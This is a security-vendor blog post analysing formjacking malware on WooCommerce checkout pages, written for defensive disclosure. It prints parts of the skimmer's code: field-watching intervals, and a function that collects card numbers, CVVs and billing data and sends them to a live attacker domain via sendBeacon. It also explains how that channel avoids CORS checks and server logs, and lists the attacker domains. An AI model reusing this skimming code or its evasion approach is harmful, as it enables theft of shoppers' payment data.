Sophisticated & Stealthy Formjacking Malware Targets E-Commerce Checkout Pages

📢 In case you missed it, Wordfence just published its annual WordPress security report for 2024. Read it now to learn more about the evolving risk landscape of WordPress so you can keep your sites protected in 2025 and beyond.

The Wordfence Threat Intelligence team recently uncovered a sophisticated formjacking malware targeting WooCommerce sites. This malware injects a fake payment form into legitimate checkout processes and exfiltrates sensitive customer data to a remote Command & Control (C2) server. Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site’s design and payment workflow, making it particularly difficult for site owners and users to detect.

A Wordfence user sent the malicious script to us via email on April 24, 2025. A detection signature was developed on April 25, refined and released to Wordfence Premium users on May 6, 2025, following our quality assurance process. Users of the free version of Wordfence will receive the same signature on June 5, 2025, after the standard 30-day delay.

We provide comprehensive security monitoring and malware removal services as part of our offerings for Wordfence Care and Response customers. If a security incident occurs, our incident response team will identify the root cause, remove any malware, and assist with related issues stemming from the infection. Malware discovered during cleanup is added to our Threat Intelligence database, which holds over 4.3 million unique malicious samples. Utilizing our entire signature set, with a 30 day delay on newly released malware signatures for free users, the Wordfence plugin and Wordfence CLI scanners detect and block over 99% of these threats. Wordfence CLI also works independently of WordPress, making it a strong server-level detection tool and a key part of our layered security approach to secure the web by defense in depth.

Malware Breakdown: A Closer Look

Visually, the malware offers no obvious red flags, as it imitates legitimate JavaScript with professional formatting and conventional syntax that masks its harmful capabilities. It appears to be a standard JavaScript file that could be part of a legitimate theme or plugin. The presence of well-formatted code, consistent indentation, and seemingly innocuous variable names give it an air of legitimacy. Nothing stands out visually that would immediately identify it as malicious.

let isChecked = localStorage.getItem("already_checked");
let btnId = "place_order"; // Button ID
let btnClass = ""; // Class if no ID
let isFrame = true; // Set to true if this is an iframe
let url5555 = "https://searchpixelstuff.top/api/accept-car";
let iframeId = "";
let iframeClass = "__PrivateStripeElement";
let loaded = false;
let loaded2 = false
let urlInclude = "checkout";

The script checks whether it is running on a checkout page and whether it has already harvested data from the current session. This simple check prevents the malware from triggering multiple times on the same user session, which could alert the user to suspicious activity.

function allChecked() {
    return document.URL.includes(urlInclude) && localStorage.getItem("already_checked") !== "1";
}

More importantly, the script injects a completely fake but professional-looking payment form into the checkout process using the renderForm() function. This function creates an HTML div element with styling that closely mimics legitimate payment forms, complete with fields for a credit card number, an expiration date, and a security code. It also includes an SVG image that resembles a generic payment card icon for added legitimacy:

What sets this script apart from other similar malicious scripts is the data exfiltration mechanism.

function rednerBtn() {
    const checkout = document.getElementById("place_order")
    checkout.classList.add("s_div1_btn")
    checkout.addEventListener("click", () => {
        let dataObject = {
            domain: window.location.origin,
            card: localStorage.getItem("cardNum"),
            exp: localStorage.getItem("exp"),
            cvv: localStorage.getItem("cvv"),
            first_name: localStorage.getItem(firstNameVal) ? localStorage.getItem(firstNameVal) : "",
            last_name: localStorage.getItem(lastNameVal) ? localStorage.getItem(lastNameVal) : "",
            company: localStorage.getItem(companyVal) ? localStorage.getItem(companyVal) : "",
            address1: localStorage.getItem(addrOneVal) ? localStorage.getItem(addrOneVal) : "",
            address2: localStorage.getItem(addrTwoVal) ? localStorage.getItem(addrTwoVal) : "",
            city: localStorage.getItem(cityVal) ? localStorage.getItem(cityVal) : "",
            postcode: localStorage.getItem(postCodeVal) ? localStorage.getItem(postCodeVal) : "",
            phone: localStorage.getItem(phoneVal) ? localStorage.getItem(phoneVal) : "",
            email: localStorage.getItem(mailVal) ? localStorage.getItem(mailVal) : "",
            uagent: navigator.userAgent
        };
        let dobj = {
            domain: window.location.origin,
            dataObject: dataObject
        }
        if(localStorage.getItem("already_checked") !== "1"){
            navigator.sendBeacon(url5555, JSON.stringify(dobj));
            if(localStorage.getItem("cardNum") && localStorage.getItem("exp") && localStorage.getItem("cvv")){
                localStorage.setItem("already_checked", "1");
            }
        }
    })
}

The malware author repurposed the browser’s localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page.

By storing captured payment card details and billing information in localStorage rather than only capturing it once during form submission, the malware gains several advantages:

Persistence across sessions: Even when the user closes the browser tab or completely restarts the browser, the stolen credentials remain accessible to the malware upon return to the compromised site.
Resilience against interruptions: If network connectivity is disrupted during the initial capture, the malware doesn’t lose the stolen data – it remains safely stored until connectivity is restored.
Anti-forensic capabilities: By controlling when data is transmitted rather than sending it immediately, the malware can better obscure the connection between the user’s form submission and the exfiltration event, making it harder to detect through timeline analysis.

This technique demonstrates how the attackers have repurposed legitimate web technologies specifically designed for user convenience for uses that directly undermine security and privacy.

Upon pressing the “Place Order” button, the script sends the collected credit card data and personal info to the hackers while allowing normal order processing to continue.

For the getaway and silent non-blocking data exfiltration, this malware uses the method navigator.sendBeacon():

navigator.sendBeacon(url5555, JSON.stringify(dobj));

The navigator.sendBeacon() method allows for the asynchronous transfer of small amounts of data from the User Agent to a web server. It makes POST requests without waiting for a response and without triggering Cross-Origin Resource Sharing (CORS) preflight or being easily intercepted.

Unlike fetch() or XMLHttpRequest(), which may trigger a CORS preflight (an OPTIONS request) when certain headers or methods are used, sendBeacon() is intentionally limited in how it works to avoid that additional request and traffic.

More specifically, the sendBeacon() function adheres to these rules for simple requests:

sendBeacon() is restricted to POST requests in the context of the malware.
The Content-Type header is fixed to text/plain;charset=UTF-8 by the attackers.
It does not utilize custom headers.

According to the fetch specifications, a simple cross-origin request (that doesn’t require a preflight) must:

Use GET, HEAD, or POST
Not set custom headers (e.g., Authorization, X-My-Custom-Header)
Use allowed content types: text/plain, application/x-www-form-urlencoded, or multipart/form-data

The function sendBeacon() conforms to these limits, which eliminates the need to send an OPTIONS preflight request.

It is often used for analytics or diagnostic purposes, since the function can be called when a user closes a page.

As a result, this mechanism doesn’t slow down the checkout process, works even if the user navigates away from the page temporarily, and leaves almost no traces in browser tools when transmitting stolen data to the C2 server. Error messages are not triggered and a response from the C2 server is not expected. Additionally, requests like these are made directly from the browser to the capturing server, which means that these requests won’t show up in log files of infected sites.

The script continuously monitors all billing form fields on the checkout page using multiple setInterval() calls that store all customer information in localStorage:

javascriptsetInterval(() => {
    if(allChecked()){
        localStorage.setItem(mailVal, document.getElementById(mailVal).value)
    }
}, 1000)
// [Multiple similar intervals for other form fields]

This approach ensures that even if a customer fills out their information but doesn’t immediately complete the order, their data is still captured for later exfiltration.

Intrusion Vector and Affected Components

Based on the investigation and inspection of cached files, the infection appears to have originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via a plugin that allows administrators to add custom code. One observed indicator was the following comment in a cached file:

<!-- start Simple Custom CSS and JS -->

This suggests that the Simple Custom CSS and JS plugin, or a similar custom JavaScript plugin, was used post-compromise to insert JavaScript into the site. It is important to note that this plugin does not appear to have any known vulnerabilities and was likely misused after administrative access was gained.

Unlike typical infections involving malicious PHP files, this case involves JavaScript being dynamically inserted and cached, likely through database-stored plugin settings.

It remains possible that other custom JS injection plugins were used as vectors, especially those that allow inline code rather than saving to static files. Logs were not available at the time of investigation to further validate the source of the initial compromise.

Indicators of Compromise

The malware appears to be predominantly present in cached pages. This suggests that the malicious code may be injected in the database or injected dynamically. If you have a caching plugin, you should be able to scan the cache directory using Wordfence.

Additionally, look out for the following:

Use of navigator.sendBeacon() API to external domains during checkout
Unexpected JavaScript code running on checkout pages
Unusual localStorage activity storing payment information
Multiple setInterval calls monitoring billing fields

To protect yourself you can try any of the following:

Install browser extensions like uBlock Origin to monitor and block suspicious network activity
Use browser developer tools to inspect network requests during checkout for unauthorized data transmissions
Check if the checkout page behaves differently than normal – watch for unexpected pop-ups, unusual permission requests, or layout changes
When possible, allow use of virtual credit cards or secure payment providers like PayPal that mask the actual card details
Consider using disposable payment cards for online transactions to limit exposure
Monitor your bank statements regularly for unauthorized charges
Clear browser cache and cookies after making purchases on potentially compromised sites
Use a dedicated browser or private browsing session for financial transactions

Involved Domains

searchpixelstuff.top
justmerikschill.top
pinkmanpixel.top
schoolmeriks.top

The domains above are listed on Spamhaus DBL and known and identified in malicious campaigns to disseminate malware.

Conclusion

In today’s blog post, we highlighted sophisticated credit card skimming malware that masquerades as a legitimate payment form on WooCommerce checkout pages. It employs advanced techniques to blend with the site’s existing design, harvest complete customer and payment data, and secretly transmit this information using methods that evade common detection tools.

The malware uses the browser’s built-in memory storage to temporarily save captured data between page refreshes and prevent duplicate submissions. By storing values like card numbers, expiration dates, and security codes in the browser’s memory, it creates a hidden store of sensitive information that remains available throughout the customer’s shopping session.

Even more concerning is its method for secretly transmitting data to attackers, which works in the background without disrupting the normal checkout process. Unlike typical data transfers that might be noticeable in security monitoring tools because they happen server-side, these transmissions happen silently, don’t require waiting for responses, continue working even if the customer leaves the page, and most importantly, don’t trigger the security warnings that might alert users or site owners to the data theft.

Wordfence Premium, Care and Response users, as well as paid Wordfence CLI customers, received malware signatures to detect this malware on May 6, 2025. Wordfence free users, and Wordfence CLI free users, will receive this signature after a 30 day delay on June 5, 2025.

If you believe your site has been compromised with this malware, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post Sophisticated & Stealthy Formjacking Malware Targets E-Commerce Checkout Pages appeared first on Wordfence.

Cookie	Duration	Description
_GRECAPTCHA	5 months 27 days	This cookie is set by the Google recaptcha service to identify bots to protect the website against malicious spam attacks.
cookielawinfo-checbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-advertisement	1 year	Set by the GDPR Cookie Consent plugin, this cookie is used to record the user consent for the cookies in the "Advertisement" category .
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Malware Breakdown: A Closer Look

Intrusion Vector and Affected Components

Indicators of Compromise

Involved Domains

Conclusion

Leave a Comment Cancel reply